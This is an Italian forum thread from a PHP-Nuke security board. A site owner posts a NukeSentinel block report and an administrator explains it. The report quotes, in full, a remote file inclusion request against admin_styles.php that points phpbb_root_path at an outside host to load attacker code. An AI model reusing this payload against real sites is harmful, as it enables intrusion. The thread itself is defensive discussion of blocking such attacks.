Argomenti: 1487    Messaggi: 8188   Letture: 629943   Risposte: 6709       (Ultime News)------|    Aggiornamento Ip2Country al 02/09/2008 - (06-09-2008 - 23:28:31 - di Sniffer)    ||    Aggiornamento Ip2Country al 03/08/2008 - (04-08-2008 - 23:29:03 - di Sniffer)    ||    NukeSentinel 2.6.01 - (04-08-2008 - 23:10:47 - di Sniffer)    ||    Aggiornamento Ip2Country al 24/03/2008 - (24-03-2008 - 23:16:04 - di Sniffer)    ||    NukeSentinel 2.5.17 - (24-03-2008 - 23:13:14 - di Sniffer)    ||    PHP-Nuke Patch 3.5 - (16-03-2008 - 02:56:39 - di Sniffer)    |------

Regolamento: Le principali regole da rispettare per poter far parte della community... cosigliamo di visionarle per evitare malintesi. Script: Per motivi di sicurezza il sistema blocca l'inserimento di alcuni script per sapere come fare cliccare qui  FAQ  •  Cerca  •  Lista degli utenti  •  Gruppi utenti  •  Profilo  •  Messaggi Privati  •  Login Abuse-filter Indice del forum » Sicurezza    Precedente :: Successivo Autore Messaggio Cloud Affezionato Registrato: Dec 27, 2006 Messaggi: 46 Oggetto: Abuse-filter Da un paio di giorni ricevo delle mail dal sentinel che stanno a dimostrare dei chiari tentativi di attacco al mio sito: Citazione: Data e ora: 2007-04-16 22:36:29 CEST GMT +0200 IP bloccato: 80.253.99.162 ID Utente: Visitatore (1) Motivo: Abuse-Filter -------------------- User-Agent: libwww-perl/5.805 Query string: www.jrpgworld.it//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://62.129.173.149/img/dog.c? Stringa GET: www.jrpgworld.it//modules/Forums/admin/admin_styles.php?phpbb_root_path=http://62.129.173.149/img/dog.c? Stringa POST: www.jrpgworld.it//modules/Forums/admin/admin_styles.php Rinviato per: none IP del client: none Indirizzo remoto: 80.253.99.162 Porta remota: 45397 Metodo Richiesta: GET Questo è solo il primo di altri cinque e penso che non siano gli ultimi... Sono tentativi a successione fino a che non trovano una falla nel mio nuke? Volevo chiedere, è possibile bloccare automaticamente ogni ip che abbia un deteminato user-agent o un determinato testo/stringa? L'IP varia sempre, ma la destinazione finale a cui tenta di reindirizzare è sempre quella. Il mio sentinel mi proteggerà per sempre? PS: La mia è la versione 2.5.04, non ancora faccio l'aggiornamento all'ultima versione (2.5.07). Inviato: Mar Apr 17, 2007 12:15 am Sniffer Amministratore Registrato: Jul 20, 2003 Messaggi: 3039 Località: Verona Oggetto: Si è un attacco tentando di sfruttare una vecchia falla nel modulo forums ma non ti preoccupare quel genere di attacchi vengono bloccati da Sentinel, io ne ricevo parecchi ogni giorno e tra i tanti sfruttano anche quella. Configura Sentinel per bloccare l'ip temporaneamente un ban permanente non servirebbe a nulla se vengono utilizzati dei proxy e rischi di bloccare futuri ip che non centrano nulla. _________________ Non inviatemi pm con richieste di aiuto grazie.  Su questo forum solo gli utenti  registrati possono vedere i links!    Registrati o fai il login Inviato: Mar Apr 17, 2007 12:37 am Cloud Affezionato Registrato: Dec 27, 2006 Messaggi: 46 Oggetto: Capisco, a sto punto non mi conviene bannare questi IP, tanto lo cambia continuamente! Comunque grazie Sniffer! Inviato: Mar Apr 17, 2007 9:01 am Mostra prima i messaggi di: Tutti i messaggi1 Giorno7 Giorni2 Settimane1 Mese3 Mesi6 Mesi1 Anno Prima i vecchiPrima i nuovi  Tutti i fusi orari sono GMT + 2 ore Indice del forum » Sicurezza   Vai a: Seleziona un forum Regolamento----------------Regolamento PHP Nuke----------------PHP-NukeTemi PHP-NukeAddons, Blocchi, ModuliSicurezzaPatch e fix Generale----------------Aiuto PC!!!!AnnunciBuchiVarie  Key   Non puoi inserire nuovi Topic in questo forum Non puoi rispondere ai Topic in questo forum Non puoi modificare i tuoi messaggi in questo forum Non puoi cancellare i tuoi messaggi in questo forum Non puoi votare nei sondaggi in questo forum Powered by phpBB © 2001, 2005 phpBB Group Forums © Tutti i diritti riservati Copyright © 2003-2008